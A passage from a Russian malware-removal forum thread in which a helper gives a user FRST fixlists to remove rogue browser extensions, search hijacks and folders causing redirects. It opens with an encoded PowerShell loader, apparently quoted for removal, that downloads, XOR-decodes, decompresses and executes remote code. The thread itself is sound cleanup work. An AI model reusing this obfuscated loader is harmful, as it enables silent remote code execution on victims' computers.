AcwBmAGgAdABjADEAWgBkAE4AVQB4AGIAUgBhAFQAUwA2AEIAMgBmAEUAQwBsAGcAVwA0AGMAeABGADMAbQA0AE4ASQBNAFQAeQB6AGYAZAA5ADgAdABTAE4AUABmAHIAYwBuAGYAeQBtADYAbwBGAFQAcgBMAFEAOABJAG8ALQBCAEkAcQBtAHYARQByAFMAUgBTAHEASABmAGMAcgBxADAAYgBLAHQAQgBnAE4AbABiAHgAcgBqAEgAWQB3AFUAbgBXAGEANQBZADMAZwAwADgAbwBiADQAMwAxAG0ANAA0AHgAZwBDAFcAcgBlAGwAYgBoAHMAQgBhAEQAZABiAFQASgBWAGMAVAB3AC0AUQAtAEsARQBYAFkAOQBGADYAMgByAFQAQwBqAFoAZAAzAFIAcgBTAC0AWAA4AEkAdgB3ADgASgBJAFgATQA3AFoATQBjAEsASgBkAGIAWQAzAFEAOABlAHIAMQA5AGsAUgBsAGcAQQBTAHAAaQBYAGcAMwBpAEgATgA4AGUAUABCAC0AawBlAC0ARAAzAHkANAB6AFkANAA0AEYANQB6AEsAdAA2AFgAdwAtAEsARwBCAC0ATAB4AGIAZwB1AF8AeABfAFgAZgBqAGQANwBOADMAUQBoAEcANQB0AE4AWQBEAGQARABCADYAagA4AGUASgBIAHoARQA5ADkAOQBsAFIAawBwAGwAdQB5AF8AOQAtAFUAawBGADAAdwAtAGMATwB4AGoAZABlAHgAbgBmAGwAeAByAEYAYgAyAGIATgBRAEQAMgBHAHkATwBtAEMAYgBkAGYAawA4AFkASwBmAGIAMgBJAGsAYgA1AHIAMgBzAEIAYQBJADAAcgBsAGMAUQBfAFEAagBMAGYAQgA2ADYAdABQAEgAUgBQAE0AUwBaAHAALQBVACYAYwA9AEUAVgA3AEcARgBRAEEAMAA3AG8ARgA3ADcAWQBlAE8AVwA0AGYATQBpAHEAUgA4AFUAWAA1ADUAMQBfAFoAeAAwAFEAaABEAHUAdQB4AFMAZwBVADQAUABXAEcAQwBKAHgAUgBiAE4ATQB1ADcAbAB5AEIAdwBxAGoAZwBMAF8AQwB4ADkASABlAEUAQgB6AFYAWQBEADQAVQBOAFIAUQBTAFkAUABBAG4ANQBxAFcAbwB6AGcAWgBVAGkALQBDAEcAeQBSAFUAUQBRAG0AZwBvAFUAYQBaAE4AagBwADgAZQB3AFoAZABKAHkAaABzADYAdQBGAFcATwBNAFUAWgBDADQAdQBfAFIAQwA3AFIAUQBUAGwANgBxADAATgAyAEsARAAzAHYAXwBnAFYARQB0AHEATwB1AFAAVwBMAFEAWgBrAHQATQBLAFEAQgBNAFIATgBlAGEAaQB4AEwAUQA1AE4AQQBrAG4AeQBwAEgANwBOAHQAUQBBAEIAaAAtADcAcABFAHUARgBEAHUAdQB5AHEASABJADUARABDADEAUgBFAGsAVwBZAEwANQBTAGsAZgBKAFkANAB1AF8ASwBEAFkAZwBYAG0ARgB1AGgAaQBXAHQAQQBzAFgAQwA3AGIAaQBHAGEAcABBADkATgBaAEwAWgBCAEYAYwBkAEwAZgBjAGYANgBwAHcATQBrAFkAbQA1AFMAdgBiAFEAYgB5AEoAVgBWADUAYgBPAFgASQBqAFIAcgBNAFoAYwAwAFAATgA1AE8AaQBCAGMAMQA5AHgARwBfAG4AMwBKADcATQBPAHoAUgBWADkAdAA3AEMAWAA2AEYAbAB4AEEAZgAzAFUAQQA2AEwAMABfAHAAQgBFADUAawBGAFIASQBkAEYAbgBjAEIANABBAE4AZgB6AHMAYwBKADAASQBRAEwAdQBoAE4AcwBGAHgAeQBSADAAWQBQAGQAVABXAEYAZQBHADgAdAAzAGMAcwAtAG8AQgB6AFcAWQBwAE8ASgBJAEIAOABTAFkAVwBoAEoAaABIAEsAZgBaADYARwBNAEMAcgBqAEIASQBRAFoAZQBhAFoAawB5ADQAQgA4AGoASgBPAFgAMABtAEIASABUAHgAZwBfADEAWQByAHIAMAA3AGwAUwBPADkAOQBJAFYAUwA4AHMATAB4AGkAWAB0ADkAcgB6AHQAUgBwAG4AQgBEAGsASgB4AGIAcQB5AEEAOQBMAF8AdgBmAEIAbwBUADYASQBrAGcAQgBiAFkAVwBlAFYAMQBZAHMAcwB5AFYASQAtAF8ASgBYAHkAYwBmAEsAcQBIAEMAdgBjADEALQBlAFAAbABVAFUAaQBaAGsAbABnAE8AWQBxADUATwAzADkAdABMAF8AeQBtAEYAUQBuAHIAaABKAEQAQwBnAEIAbgBIAFgAVABKAFoAcQAzAHkAbQA2AEQAaQBsAEEANAAtADUAbABvAEQAVQBqAGEAMQBYAHcATgBvAG4ARAB4AGoAUQB4AHMAOQA4AHgAQQBnAE4AegAtAFQAWQBfAFEAeQBWAGYARAB6AHUAeAAtAGsAZQBKAEoAbwBaAGMASAB4AFcAUwBaADMAeABBAGEAOABOADUATQAyAFIAXwBwADYAUgB4AHQASABIAFgAYQBJAG4AagAwADcAMgBoAFoAagBfAE0AdgBsAHoAMgBoAF8AUABfAHQAdwB6AGcAUwBfAGQAOABUAFMAUgBSAE4AOABpAEYATwBwAHoATgA3AFoAQgAtAHUARQBoAEUAUwBQAFIASABaAE4AWABfAHQARABuAFcAagBIAHMAWQBCADMAbwBEAGkASgBhACYAcgA9ADMAMgAwADIAMgAzADMANgA1ADQAMwAxADcANwA0ADQAMgA3ADYAIgA7ACQAcwB0AHMAawA9ACIAewBBAEMAMwBGADkAMwBFADAALQBDADEANQBEAC0AQgBCADcAMgAtAEIAOQA0AEYALQA5AEEANgA3ADUANgBFAEUANgA0AEMAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsACgB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7ADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFEATwBVAFAATQBNAFMATABEAEMAQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AAoAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAUQBPAFUAUABNAE0AUwBMAEQAQwBCACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAIAB9ADsAZQB4AGkAdAAgADAAOwA=
Reboot:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

**Molotoff** · 20.02.2016, 20:31

Выполнено. Но редирект все равно происходит. Причем с этого сайта.

SQ · 20.02.2016, 20:40

приложите новый лог FRST.

**Molotoff** · 21.02.2016, 03:47

Выполнено. Ксати, Speed Dial оказался нужным расширением

SQ · 21.02.2016, 15:24

Сообщение от Molotoff

Выполнено. Ксати, Speed Dial оказался нужным расширением

Сможете установить его заново?

Знакомы расширения в Firefox?

Код:

FF Extension: ImTranslator - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\{9AA46F4F-4DC7-4c06-97AF-5035170634FE}.xpi [2016-01-22]
FF Extension: Turn Off the Lights - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-12]
FF Extension: ZenMate Security, Privacy & Unblock VPN - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-17]
FF Extension: Wappalyzer - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-06]

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
SearchScopes: HKU\S-1-5-21-396966855-316378592-212668334-1000 -> {04D4ED4A-CE75-4FA7-95FE-30FAB552CA14} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11467
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-20]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-20]
Folder: C:\ProgramData\KMSAutoS
Folder: C:\Users\IlyinBoris\AppData\Roaming\HAL
Reboot:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

**Molotoff** · 21.02.2016, 17:12

Выполнено. По поводу расширений - они все мои, ставил давно.

SQ · 21.02.2016, 18:49

Приложите лог утилиты FRST, но только отметьте "Shortcut.txt".

**Molotoff** · 22.02.2016, 03:34

Готово.

SQ · 22.02.2016, 04:40

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
```
CreateRestorePoint:
CloseProcesses:
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-21]
```
Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

Уточните подробнее, как воспроизводятся "Но редирект все равно происходит."

**Molotoff** · 24.02.2016, 10:27

Готово. Вопрос в том, что на этом сайте и на других, даже если ничего не делаешь - перекидывает на другие сайты и всплывает по нескольку окон.

Чтобы написать это сообщение, приходится долго и упорно все закрывать и останавливать.